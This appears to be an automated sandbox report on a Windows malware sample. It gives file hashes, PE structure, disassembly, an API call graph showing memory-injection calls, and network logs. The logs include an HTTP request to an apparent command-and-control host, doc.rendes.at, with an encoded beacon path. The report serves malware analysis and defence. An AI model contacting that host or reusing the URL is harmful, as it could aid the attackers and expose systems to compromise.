C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F5B32550-C6EC-11E8-A1F8-44AC2DAE138A}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):21592
Entropy (8bit):1.7627604255262714
Encrypted:false
MD5:A06D7B4CA86645FD6907B1248E3B4775
SHA1:6CD6CC371A1B08EE05C14EE8513496A353569982
SHA-256:037DC37D0382D95D73B98219FEEBF099F1FDC96F8A51B71A13BAE885B9B05D50
SHA-512:7616DA33EB92F11B6270C1BF746C7E339CB67693A321176DD53E7E98E2E3D7186AC638FB3810B70891F29B775D878B9E1D845411A5220840D0815724D35AABFD
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F5B32552-C6EC-11E8-A1F8-44AC2DAE138A}.dat
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:Microsoft Word Document
Size (bytes):16984
Entropy (8bit):1.5772396259895078
Encrypted:false
MD5:4AA3ABB003514E1CEFC4BD0847C6CBD6
SHA1:9677A883402ABFFB3D1226223956FB2302D2884D
SHA-256:2226D184979E293213BED7F088811E4E8E789E3D28211568A6122DF0E50B3C71
SHA-512:14DDE72B90922243F49AC5E8BE62F4B42C91EFF2A1794D97CE169FA7D0231C1FD57F52E0A173BE3094DD94958A49E4581FE069B9E1FFB40FCFC388BDE9BDF0CC
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FF8G8DG0\favicon[1].ico
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):237
Entropy (8bit):6.1480026084285395
Encrypted:false
MD5:9FB559A691078558E77D6848202F6541
SHA1:EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

Name:doc.rendes.at
IP:47.254.153.156
Active:true
Malicious:false
Reputation:high

Contacted URLs

Name:http://doc.rendes.at/wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi
Malicious:false
Reputation:unknown

    Contacted IPs

    Public

    IP:47.254.153.156
    Country:United States
    ASN:45102
    ASN Name:CNNIC-ALIBABA-CN-NET-APAlibabaChinaTechnologyCoLtd
    Malicious:false

    Private

    IP
    192.168.2.255

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):6.528337649042211
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:zbetcheckin_tracker_propan.exe
    File size:183296
    MD5:7e17f0f35d50f49407841372f24fbd38
    SHA1:921ad55a3f593239b906163cf1bb8001194822f3
    SHA256:934c3445fe9d1a3d4cca4d3ec09c9191d8f9067e13e58fa0b288cb520cd40785
    SHA512:8200be71fc9015e9160ce7a3f665a917e058c8ee8753c178f43cf62a519154cafd83125787b565748c9061d9fcbe3c96f65edfa2dbc01c17f0e20f540386a1d1
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(.."l..ql..ql..qK0.q...qK0.q:..q...qe..ql..q...qK0.qp..qK0.qm..qr..qm..qRichl..q........................PE..L....v.[...........

    Static PE Info

    General

    Entrypoint:0x40ca12
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
    DLL Characteristics:TERMINAL_SERVER_AWARE
    Time Stamp:0x5BB076BF [Sun Sep 30 07:09:51 2018 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:65787a6837f68f71463896efdbebc84c

    Entrypoint Preview

    Instruction
    call 00007FBDAD823FE1h
    jmp 00007FBDAD820A8Bh
    mov eax, dword ptr [esp+04h]
    mov dword ptr [00436074h], eax
    ret
    push ebp
    lea ebp, dword ptr [esp-000002A8h]
    sub esp, 00000328h
    mov eax, dword ptr [0042C4A0h]
    xor eax, ebp
    mov dword ptr [ebp+000002A4h], eax
    push esi
    mov dword ptr [ebp+00000088h], eax
    mov dword ptr [ebp+00000084h], ecx
    mov dword ptr [ebp+00000080h], edx
    mov dword ptr [ebp+7Ch], ebx
    mov dword ptr [ebp+78h], esi
    mov dword ptr [ebp+74h], edi
    mov word ptr [ebp+000000A0h], ss
    mov word ptr [ebp+00000094h], cs
    mov word ptr [ebp+70h], ds
    mov word ptr [ebp+6Ch], es
    mov word ptr [ebp+68h], fs
    mov word ptr [ebp+64h], gs
    pushfd
    pop dword ptr [ebp+00000098h]
    mov esi, dword ptr [ebp+000002ACh]
    lea eax, dword ptr [ebp+000002ACh]
    mov dword ptr [ebp+0000009Ch], eax
    mov dword ptr [ebp-28h], 00010001h
    mov dword ptr [ebp+00000090h], esi
    mov eax, dword ptr [eax-04h]
    push 00000050h
    mov dword ptr [ebp+0000008Ch], eax
    lea eax, dword ptr [ebp-80h]
    push 00000000h
    push eax
    call 00007FBDAD823FDEh
    lea eax, dword ptr [ebp-80h]
    mov dword ptr [ebp-30h], eax
    lea eax, dword ptr [ebp-28h]
    add esp, 0Ch
    mov dword ptr [ebp-80h], C000000Dh
    mov dword ptr [ebp-74h], esi
    mov dword ptr [ebp-2Ch], eax

    Data Directories

    Name                                  Virtual Address  Virtual Size  Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
    IMAGE_DIRECTORY_ENTRY_IMPORT          0x2ab50          0x64          .rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x37000          0x1458        .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x18b68          0x40          .rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
    IMAGE_DIRECTORY_ENTRY_IAT             0x17000          0x218         .rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

    Sections

    Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
    .text   0x1000           0x1562a       0x15800   False     0.545387445494   data       6.51475744719  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .rdata  0x17000          0x146f6       0x14800   False     0.76806640625    data       6.25790724155  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data   0x2c000          0xac18        0x1200    False     0.344835069444   data       3.39487152334  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc   0x37000          0x1458        0x1600    False     0.437144886364   data       4.50632518873  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    Name             RVA      Size   Type  Language  Country
    RT_CURSOR        0x374d8  0x134  data
    RT_CURSOR        0x37628  0x134  data
    RT_ICON          0x37788  0x568  GLS_BINARY_LSB_FIRST
    RT_ICON          0x37cf0  0x468  GLS_BINARY_LSB_FIRST
    RT_DIALOG        0x372f0  0xe2   data
    RT_DIALOG        0x373d8  0xe2   data
    RT_GROUP_CURSOR  0x374c0  0x14   Lotus 1-2-3
    RT_GROUP_CURSOR  0x37610  0x14   Lotus 1-2-3
    RT_GROUP_ICON    0x37760  0x22   MS Windows icon resource - 2 icons, 16x16, 256-colors
    RT_VERSION       0x38158  0x19c  data
    RT_MANIFEST      0x382f8  0x15a  ASCII text, with CRLF line terminators

    Imports

    DLL           Import
    USER32.dll    DefWindowProcA, MessageBoxA, DestroyWindow, UpdateWindow, ShowWindow, GetMenu, AdjustWindowRect, EndDialog, InvalidateRect, wsprintfA, SetWindowTextA, DrawMenuBar, BeginPaint, EndPaint, IsIconic, MoveWindow, PostQuitMessage, GetWindowLongA, DialogBoxParamA, LoadStringA, EnableMenuItem, GetWindowRect, SendMessageA, SetWindowPos, PostMessageA, GetMessageA, TranslateMessage, DispatchMessageA, MessageBeep, LoadIconA, LoadCursorA, RegisterClassA, GetSystemMetrics, CreateWindowExA
    comdlg32.dll  GetOpenFileNameA
    VERSION.dll   GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
    KERNEL32.dll  GetDateFormatA, RtlUnwind, InitializeCriticalSection, Sleep, CompareStringA, GetCurrentProcessId, InterlockedDecrement, GetCurrentThreadId, SetLastError, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsDebuggerPresent, GetVersionExA, CompareStringW, GlobalFindAtomW, GlobalAddAtomW, GlobalFlags, GetTickCount, GetACP, GetLocaleInfoA, RaiseException, HeapFree, HeapAlloc, GetProcessHeap, GetStartupInfoW, GetSystemTimeAsFileTime, ExitProcess, VirtualAlloc, GetProcAddress, GetModuleHandleA, GetVersion, GetCurrentProcess, WideCharToMultiByte, WriteFile, LoadLibraryA, lstrcpyA, LCMapStringW, MultiByteToWideChar, CreatePipe, GetExitCodeProcess, SetFilePointer, GetDriveTypeA, GetCurrentDirectoryA, CreateFileA, SetEnvironmentVariableW, SetEnvironmentVariableA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, IsValidLocale, EnumSystemLocalesA, GetStringTypeW, GetStringTypeA, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, GetTimeFormatA, QueryPerformanceCounter, VirtualFree, HeapCreate, HeapDestroy, GetStartupInfoA, SetHandleCount, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStdHandle, FlushFileBuffers, LCMapStringA, IsValidCodePage, GetOEMCP, GetCPInfo, VirtualQuery, GetSystemInfo, VirtualProtect, HeapSize, GetFileType, SetStdHandle, HeapReAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess

    Version Infos

    Description      Data
    InternalName     IMSG
    FileDescription  Parser
    FileVersion      1748
    CompanyName      loxlox
    Translation      0x0409 0x04b0

    Network Behavior

    TCP Packets

    Timestamp                            Source Port  Dest Port  Source IP       Dest IP
    Oct 3, 2018 11:16:29.028738976 CEST  55984        53         192.168.2.2     8.8.8.8
    Oct 3, 2018 11:16:29.415028095 CEST  53           55984      8.8.8.8         192.168.2.2
    Oct 3, 2018 11:16:29.426309109 CEST  49233        80         192.168.2.2     47.254.153.156
    Oct 3, 2018 11:16:29.427006006 CEST  49234        80         192.168.2.2     47.254.153.156
    Oct 3, 2018 11:16:29.450634956 CEST  80           49233      47.254.153.156  192.168.2.2
    Oct 3, 2018 11:16:29.450643063 CEST  80           49234      47.254.153.156  192.168.2.2
    Oct 3, 2018 11:16:29.450722933 CEST  49233        80         192.168.2.2     47.254.153.156
    Oct 3, 2018 11:16:29.450733900 CEST  49234        80         192.168.2.2     47.254.153.156
    Oct 3, 2018 11:16:29.452330112 CEST  49233        80         192.168.2.2     47.254.153.156
    Oct 3, 2018 11:16:29.476313114 CEST  80           49233      47.254.153.156  192.168.2.2
    Oct 3, 2018 11:16:32.098453045 CEST  50783        53         192.168.2.2     8.8.8.8
    Oct 3, 2018 11:16:32.103457928 CEST  51303        53         192.168.2.2     8.8.8.8
    Oct 3, 2018 11:16:32.113343000 CEST  53           50783      8.8.8.8         192.168.2.2
    Oct 3, 2018 11:16:32.118056059 CEST  53           51303      8.8.8.8         192.168.2.2
    Oct 3, 2018 11:16:32.121105909 CEST  55522        53         192.168.2.2     8.8.8.8
    Oct 3, 2018 11:16:32.135778904 CEST  53           55522      8.8.8.8         192.168.2.2
    Oct 3, 2018 11:16:33.461882114 CEST  59398        53         192.168.2.2     8.8.8.8
    Oct 3, 2018 11:16:33.471844912 CEST  55803        53         192.168.2.2     8.8.8.8
    Oct 3, 2018 11:16:33.476080894 CEST  53           59398      8.8.8.8         192.168.2.2
    Oct 3, 2018 11:16:33.486018896 CEST  53           55803      8.8.8.8         192.168.2.2

    UDP Packets

    Timestamp                            Source Port  Dest Port  Source IP    Dest IP
    Oct 3, 2018 11:16:29.028738976 CEST  55984        53         192.168.2.2  8.8.8.8
    Oct 3, 2018 11:16:29.415028095 CEST  53           55984      8.8.8.8      192.168.2.2
    Oct 3, 2018 11:16:32.098453045 CEST  50783        53         192.168.2.2  8.8.8.8
    Oct 3, 2018 11:16:32.103457928 CEST  51303        53         192.168.2.2  8.8.8.8
    Oct 3, 2018 11:16:32.113343000 CEST  53           50783      8.8.8.8      192.168.2.2
    Oct 3, 2018 11:16:32.118056059 CEST  53           51303      8.8.8.8      192.168.2.2
    Oct 3, 2018 11:16:32.121105909 CEST  55522        53         192.168.2.2  8.8.8.8
    Oct 3, 2018 11:16:32.135778904 CEST  53           55522      8.8.8.8      192.168.2.2
    Oct 3, 2018 11:16:33.461882114 CEST  59398        53         192.168.2.2  8.8.8.8
    Oct 3, 2018 11:16:33.471844912 CEST  55803        53         192.168.2.2  8.8.8.8
    Oct 3, 2018 11:16:33.476080894 CEST  53           59398      8.8.8.8      192.168.2.2
    Oct 3, 2018 11:16:33.486018896 CEST  53           55803      8.8.8.8      192.168.2.2

    DNS Queries

    Timestamp:Oct 3, 2018 11:16:29.028738976 CEST
    Source IP:192.168.2.2
    Dest IP:8.8.8.8
    Trans ID:0xd536
    OP Code:Standard query (0)
    Name:doc.rendes.at
    Type:A (IP address)
    Class:IN (0x0001)

    DNS Answers

    Timestamp:Oct 3, 2018 11:16:29.415028095 CEST
    Source IP:8.8.8.8
    Dest IP:192.168.2.2
    Trans ID:0xd536
    Reply Code:No error (0)
    Name:doc.rendes.at
    CName:
    Address:47.254.153.156
    Type:A (IP address)
    Class:IN (0x0001)

    HTTP Request Dependency Graph

    • doc.rendes.at

    HTTP Packets

    Session ID:0
    Source IP:192.168.2.2
    Source Port:49233
    Destination IP:47.254.153.156
    Destination Port:80
    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Timestamp:Oct 3, 2018 11:16:29.452330112 CEST
    kBytes transferred:1
    Direction:OUT
    Data:
    GET /wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: doc.rendes.at
    Connection: Keep-Alive


    System Behavior

    General

    Start time:11:14:17
    Start date:03/10/2018
    Path:C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe
    Wow64 process (32bit):true
    Commandline:'C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe'
    Imagebase:0x400000
    File size:183296 bytes
    MD5 hash:7E17F0F35D50F49407841372F24FBD38
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    General

    Start time:11:16:07
    Start date:03/10/2018
    Path:C:\Program Files\Internet Explorer\iexplore.exe
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Imagebase:0x13ff20000
    File size:814288 bytes
    MD5 hash:446332D1A5576870E436B13AEB27CA8E
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    General

    Start time:11:16:08
    Start date:03/10/2018
    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
    Wow64 process (32bit):true
    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2
    Imagebase:0x260000
    File size:815304 bytes
    MD5 hash:F2831268EC600225F611DC02166EACF0
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low

    Disassembly

    Code Analysis

      Execution Graph

      Execution Coverage:12.4%
      Dynamic/Decrypted Code Coverage:3.1%
      Signature Coverage:15.6%
      Total number of Nodes:1406
      Total number of Limit Nodes:87

      Graph

7458->7402 7458->7405 7459->7458 7461 4029d8 7460->7461 7462 402ac5 7461->7462 7463 402aa4 lstrlenA 7461->7463 7464 402a98 lstrcmpA 7461->7464 7462->7409 7463->7461 7464->7461 7478 401046 HeapAlloc 7465->7478 7467 401c28 7467->7414 7467->7416 7468 4026b3 GetModuleFileNameA 7474 40269a 7468->7474 7469 4026ab GetModuleFileNameW 7469->7474 7470 4026df 7470->7467 7471 4026f1 GetLastError 7470->7471 7481 40105b HeapFree 7471->7481 7474->7467 7474->7468 7474->7469 7474->7470 7479 40105b HeapFree 7474->7479 7480 401046 HeapAlloc 7474->7480 7476->7418 7477->7416 7478->7474 7479->7474 7480->7474 7481->7467 7482->7426 7483->7426 7485 401994 7484->7485 7486 4019ca RtlNtStatusToDosError 7484->7486 7537 4018f0 NtMapViewOfSection RtlNtStatusToDosError 7485->7537 7487 4019c3 7486->7487 7489 40150d 7487->7489 7492 4019dc ZwClose 7487->7492 7489->7435 7493 4018f0 NtMapViewOfSection RtlNtStatusToDosError 7489->7493 7490 4019a2 7490->7487 7491 4019a8 memset 7490->7491 7491->7487 7492->7489 7493->7442 7495 401a31 7494->7495 7496 401a5b memcpy 7495->7496 7497 401a3c memcpy 7495->7497 7499 401a6b 7496->7499 7497->7499 7498 401a98 memcpy 7498->7499 7499->7498 7500 401556 7499->7500 7500->7435 7500->7446 7500->7448 7502 401321 GetModuleHandleA 7501->7502 7503 401307 7501->7503 7504 401335 7502->7504 7505 401398 7502->7505 7503->7502 7506 401385 memcpy 7503->7506 7538 401dfd 7504->7538 7505->7454 7506->7505 7509 401dfd 11 API calls 7510 401359 7509->7510 7510->7505 7511 401dfd 11 API calls 7510->7511 7512 401373 7511->7512 7512->7505 7512->7506 7552 401046 HeapAlloc 7513->7552 7515 402421 7516 402470 7515->7516 7517 402427 memset 7515->7517 7516->7435 7518 402460 7517->7518 7519 40244d 7517->7519 7553 4022ec memset 7518->7553 7519->7518 7520 402456 7519->7520 7570 40219b memset 7520->7570 7522 40245e 7581 40105b HeapFree 7522->7581 7525->7434 7527 4013af 7526->7527 7528 4025ad 16 API calls 7527->7528 7529 401425 memcpy 7527->7529 7530 4013da 7528->7530 7531 401438 7529->7531 7530->7531 
7532 4025ad 16 API calls 7530->7532 7531->7454 7533 4013f7 7532->7533 7533->7531 7534 4025ad 16 API calls 7533->7534 7535 401414 7534->7535 7535->7529 7535->7531 7536->7429 7537->7490 7539 402685 5 API calls 7538->7539 7540 401e14 7539->7540 7541 40133f 7540->7541 7542 4029cc 2 API calls 7540->7542 7541->7505 7541->7509 7543 401e26 7542->7543 7545 401e99 7543->7545 7546 401e3b CreateFileA 7543->7546 7551 40105b HeapFree 7545->7551 7546->7545 7547 401e5c SetFilePointer 7546->7547 7548 401e90 CloseHandle 7547->7548 7549 401e6a ReadFile 7547->7549 7548->7545 7549->7548 7550 401e82 7549->7550 7550->7548 7551->7541 7552->7515 7554 402325 7553->7554 7555 4023e9 7553->7555 7600 4027ad 7554->7600 7582 2d1129 7555->7582 7591 2de040 7555->7591 7558 4023fc GetLastError 7559 402405 7558->7559 7559->7522 7562 40235a memcpy 7563 40239c 7562->7563 7608 40276a 7563->7608 7566 4023e4 7566->7558 7566->7559 7567 4023dd RtlNtStatusToDosError 7567->7566 7953 40211a 7570->7953 7573 4027ad 2 API calls 7574 4021f8 7573->7574 7575 402200 GetLastError 7574->7575 7578 40220b 7574->7578 7580 402284 7575->7580 7576 402235 7576->7522 7577 4022de GetLastError 7577->7576 7578->7576 7579 40276a 2 API calls 7578->7579 7579->7580 7580->7576 7580->7577 7581->7516 7583 2d1159 InterlockedDecrement 7582->7583 7584 2d1136 7582->7584 7586 2d1168 7583->7586 7590 2d1151 7583->7590 7585 2d1139 InterlockedIncrement 7584->7585 7584->7590 7587 2d1148 7585->7587 7585->7590 7624 2d10d5 7586->7624 7612 2d102a HeapCreate 7587->7612 7590->7566 7593 2de25c 7591->7593 7599 2de05f 7591->7599 7592 2de1bc NtProtectVirtualMemory 7592->7593 7595 2de1ee 7592->7595 7593->7566 7594 2de0a6 LdrLoadDll 7597 2de1a9 7594->7597 7594->7599 7595->7593 7596 2de22d NtProtectVirtualMemory 7595->7596 7596->7593 7596->7595 7597->7592 7597->7593 7598 2de152 LdrGetProcedureAddress 7598->7599 7599->7592 7599->7594 7599->7597 7599->7598 7599->7599 7601 402336 7600->7601 7602 4027bf 7600->7602 7601->7558 7604 402749 7601->7604 7602->7601 7603 
4027e4 RtlNtStatusToDosError SetLastError 7602->7603 7603->7601 7605 402756 RtlNtStatusToDosError 7604->7605 7606 40234f 7604->7606 7605->7606 7606->7562 7606->7566 7609 402776 7608->7609 7610 402799 RtlNtStatusToDosError SetLastError 7609->7610 7611 4023bf 7609->7611 7610->7611 7611->7559 7611->7566 7611->7567 7613 2d104e GetTickCount 7612->7613 7615 2d1046 7612->7615 7633 2d39ab CreateEventA 7613->7633 7615->7590 7619 2d10a9 7621 2d10b8 7619->7621 7622 2d10ad IsWow64Process 7619->7622 7620 2d1084 GetModuleHandleA GetProcAddress 7620->7619 7620->7621 7648 2d1eca GetModuleHandleA 7621->7648 7622->7621 7625 2d10de SetEvent 7624->7625 7626 2d1126 7624->7626 7627 2d10eb SleepEx 7625->7627 7626->7590 7628 2d10fe 7627->7628 7629 2d1105 7627->7629 7628->7627 7628->7629 7630 2d110f CloseHandle 7629->7630 7631 2d1116 7629->7631 7630->7631 7631->7626 7632 2d111f HeapDestroy 7631->7632 7632->7626 7634 2d3a15 GetLastError 7633->7634 7635 2d39c2 GetVersion 7633->7635 7636 2d1061 7634->7636 7637 2d39cc 7635->7637 7636->7615 7640 2d3b0f lstrcpyn 7636->7640 7638 2d39d4 GetCurrentProcessId OpenProcess 7637->7638 7639 2d3a05 7637->7639 7638->7639 7639->7636 7642 2d3b50 7640->7642 7641 2d106d 7641->7615 7641->7619 7641->7620 7642->7641 7643 2d3b88 VirtualAlloc 7642->7643 7643->7641 7644 2d3bb8 7643->7644 7645 2d3bff 7644->7645 7646 2d3bee memcpy 7644->7646 7647 2d3c06 VirtualFree 7645->7647 7646->7647 7647->7641 7649 2d1edf 7648->7649 7650 2d1f07 CoInitializeEx 7648->7650 7649->7650 7651 2d1f19 7650->7651 7653 2d1f81 7651->7653 7664 2d4c8b GetVersionExA 7651->7664 7653->7615 7656 2d1f56 7656->7653 7657 2d1fcd 7656->7657 7658 2d1fa2 memset RtlInitializeCriticalSection 7656->7658 7657->7653 7677 2d46df 7657->7677 7658->7657 7662 2d1fe5 7662->7653 7702 2d1d31 CreateWaitableTimerA 7662->7702 7665 2d1f2f 7664->7665 7666 2d4cae 7664->7666 7668 2d4615 NtOpenProcess 7665->7668 7666->7665 7667 2d4ce2 wsprintfA 7666->7667 7667->7665 7669 2d46d7 7668->7669 7670 2d4666 NtOpenProcessToken 
7668->7670 7669->7656 7671 2d46ce NtClose 7670->7671 7672 2d4679 7670->7672 7671->7669 7673 2d46c4 NtClose 7672->7673 7674 2d46be 7672->7674 7675 2d46ae memcpy 7672->7675 7673->7671 7721 2d1015 HeapFree 7674->7721 7675->7674 7682 2d46fe 7677->7682 7678 2d4753 GetComputerNameW 7679 2d4768 7678->7679 7680 2d1fe0 7678->7680 7679->7680 7681 2d477e GetComputerNameW 7679->7681 7686 2d1173 7680->7686 7683 2d478d 7681->7683 7684 2d479c HeapFree 7681->7684 7682->7678 7685 2d4743 HeapFree 7682->7685 7683->7684 7684->7680 7685->7678 7722 2d419f 7686->7722 7689 2d419f 2 API calls 7691 2d11b4 7689->7691 7690 2d1343 7690->7662 7691->7690 7695 2d12f5 7691->7695 7728 2d4384 lstrlen 7691->7728 7694 2d132e HeapFree 7694->7662 7695->7694 7697 2d4384 3 API calls 7695->7697 7696 2d12ef 7732 2d48eb RtlEnterCriticalSection 7696->7732 7699 2d131b 7697->7699 7699->7694 7700 2d131f 7699->7700 7738 2d47cd RtlEnterCriticalSection 7700->7738 7703 2d1eb9 GetLastError 7702->7703 7704 2d1d64 7702->7704 7705 2d1ec1 7703->7705 7706 2d1d94 WaitForMultipleObjects 7704->7706 7705->7653 7707 2d1db3 7706->7707 7709 2d1e10 7706->7709 7753 2d1cb6 7707->7753 7710 2d1e1a HeapFree 7709->7710 7711 2d1e2e CloseHandle 7709->7711 7710->7709 7711->7705 7713 2d1db8 7713->7709 7714 2d1e05 7713->7714 7715 2d1e7e _allmul 7713->7715 7719 2d1e4d 7713->7719 7764 2d1bb5 7713->7764 7774 2d196e 7714->7774 7720 2d1e9a WaitForMultipleObjects 7715->7720 7719->7715 7816 2d482d RtlEnterCriticalSection 7719->7816 7720->7709 7720->7713 7721->7673 7726 2d41da 7722->7726 7723 2d4252 7724 2d1190 7723->7724 7725 2d4280 memcpy 7723->7725 7724->7689 7725->7724 7726->7723 7726->7724 7746 2d1015 HeapFree 7726->7746 7729 2d4399 7728->7729 7730 2d43aa memcpy memset 7729->7730 7731 2d12eb 7729->7731 7730->7731 7731->7695 7731->7696 7733 2d4904 7732->7733 7734 2d48fc Sleep 7733->7734 7735 2d4910 7733->7735 7734->7733 7736 2d4937 RtlLeaveCriticalSection 7735->7736 7737 2d4923 HeapFree 7735->7737 7736->7695 7737->7736 7739 2d47e6 7738->7739 
7740 2d47de Sleep 7739->7740 7741 2d47f2 7739->7741 7740->7739 7742 2d480e 7741->7742 7743 2d47ff HeapFree 7741->7743 7747 2d4593 7742->7747 7743->7742 7746->7726 7748 2d45a8 7747->7748 7749 2d45fd RtlLeaveCriticalSection 7748->7749 7750 2d45c6 StrTrimA 7748->7750 7749->7694 7751 2d45d4 7750->7751 7751->7749 7752 2d45df StrTrimA 7751->7752 7752->7751 7821 2d274d 7753->7821 7756 2d1d2b 7756->7713 7760 2d1c3c 13 API calls 7762 2d1cf8 7760->7762 7837 2d2668 SysAllocString 7762->7837 7765 2d1bd0 7764->7765 7766 2d1be5 7765->7766 7843 2d4d19 7765->7843 7768 2d1c29 7766->7768 7882 2d4bfe 7766->7882 7768->7713 7771 2d1c00 7772 2d482d 3 API calls 7771->7772 7773 2d1c18 HeapFree 7772->7773 7773->7768 7893 2d4111 7774->7893 7777 2d19b7 7777->7709 7782 2d19d9 7785 2d1a6f GetCurrentProcessId 7782->7785 7783 2d19f9 7919 2d1882 7783->7919 7784 2d1a11 7787 2d1882 3 API calls 7784->7787 7788 2d1a87 OpenFileMappingW 7785->7788 7791 2d1a01 7787->7791 7789 2d1aa0 MapViewOfFile 7788->7789 7790 2d1af2 7788->7790 7792 2d1ab0 7789->7792 7793 2d1ab2 CloseHandle 7789->7793 7790->7777 7795 2d3ceb 5 API calls 7790->7795 7791->7785 7925 2d1538 7791->7925 7792->7793 7793->7790 7794 2d1abd lstrlenW 7793->7794 7804 2d1ace 7794->7804 7797 2d1b27 7795->7797 7799 2d1b2f CreateEventA 7797->7799 7800 2d1b47 7797->7800 7952 2d1015 HeapFree 7799->7952 7807 2d1348 7 API calls 7800->7807 7802 2d274d 3 API calls 7803 2d1a42 7802->7803 7803->7785 7932 2d3d62 7803->7932 7804->7790 7941 2d1348 7804->7941 7810 2d1b65 7807->7810 7810->7777 7811 2d1ba4 CloseHandle 7810->7811 7812 2d1b71 WaitForSingleObject 7810->7812 7811->7777 7815 2d1b86 7812->7815 7815->7811 7817 2d4846 7816->7817 7818 2d483e Sleep 7817->7818 7819 2d4852 RtlLeaveCriticalSection 7817->7819 7818->7817 7819->7719 7822 2d2759 7821->7822 7823 2d1cc6 7822->7823 7824 2d22e8 CoCreateInstance CoSetProxyBlanket 7822->7824 7823->7756 7827 2d1c3c 7823->7827 7826 2d2765 7824->7826 7825 2d1015 HeapFree 7825->7823 7826->7823 7826->7825 7828 2d43cf lstrlen 
